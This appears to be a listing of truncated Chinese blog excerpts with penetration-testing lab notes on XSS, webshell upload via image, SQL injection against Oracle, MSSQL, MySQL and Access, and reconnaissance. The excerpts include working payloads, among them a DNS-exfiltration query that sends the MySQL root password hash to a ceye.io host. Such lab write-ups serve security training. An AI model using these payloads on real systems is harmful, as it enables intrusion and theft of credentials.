Vvt前端渗透XSS
反射性XSS 进入靶场 点击输入框随便输入内容回车点击右键查看元素尝试闭合试试"><script>alert('1')</script>发现单引号后的东西不见了 并且发现有一部分被当成属性使用尝试输入一个单引号看来问题出在单引号貌似单引号后的内容会被当成属性 试试' onclick=alert('1')在输入
Vvt 文件上传漏洞解析
HTTP HEAD MIME验证首先找一张比较小的图片,新建一个带有一句话木马的txt文件打开cmd这样就会得到一个含有一句话木马的新的图片进入靶场打开BURP开启代理选择我们新建的图片 然后点击上传呐我们的一句话木马就藏在这里再把后缀改成php这样我们的文件就会被当做php来解析了打开hackbarvalue=phpinfo();Windows NTFS ADS流 把文件
Vvt Oracle注入- 报错注入
进入靶场首先测试?id=1会出现什么然后加'闭合试一下报错在加--+试试正常说明可以进行注入首先查询当前用户表and%201=ctxsys.drithsx.sn(1,(select%20user%20from%20dual))--+?id=1%27%20and%201=ctxsys.drithsx.sn(1,(select%20table_name%20from%20user_tables
Vvt反弹注入
靶场准备:http://member.webweb.com香港云https://10minutemail.net匿名邮箱;构建语句已知库名admin那么首先就可以开始查表了首先构建建立一个数据库create table vvt(id int ,name char(255));注入查表名insert into opendatasource('sqloledb','server
Vvt DNS注入
利用平台SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));被拦截绕过查表查字段查内容id=1%20and%20if((select%20loa
Vvtmysql 全方位利用
union select (联合查询,可以显示多个结果)--+ (注释符号 与 # 相同)order by(猜字段)显示位(显示在页面上的字段)limit 0,1(从多个结果中,取第一个结果显示在页面上)database()(当前数据库)user()(当前连接的用户)information.schema(自带的系统信息库)table_name(表名)coulmn_name(字段名)十六
Vvt access-偏移注入
使用之前用过的方法alert(document.cookie="id="+escape("105 and 1=2"));说明存在注入点猜字段数javascript:alert(document.cookie="id="+escape("105 order by 10"));页面正常javascript:alert(do
Vvt access注入 -cookie注入
尝试cookie注入,在含有注入点页面输入:判断注入点是否存在注入:javascript:alert(document.cookie="id="+escape("171'"));删掉地址栏的?id=171 返回数据库错误猜字段数javascript:alert(document.cookie="id="+escape(&
Vvt信息收集
域名级数是指一个域名由多少级组成,域名的各个级别被“.”分开,简而言之,有多少个点就是几级域名。顶级域名:.com(商) .edu(教) .gov(政) .mil(军)一级域名:qq.com二级域名:ke.qq.com三级域名:zhz.ke.qq.com whois就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商)。在线查询:&nb
Vvt 3.6 1,2,3作业
1题 http://120.203.13.75:8150/New/PostBased/RankOne/sql-one/ 1使用万能密码1' or 1=1# 2' order by 3 #查字段 ' order by 2 # 消失 可以利用报错注入 'union select 1,databa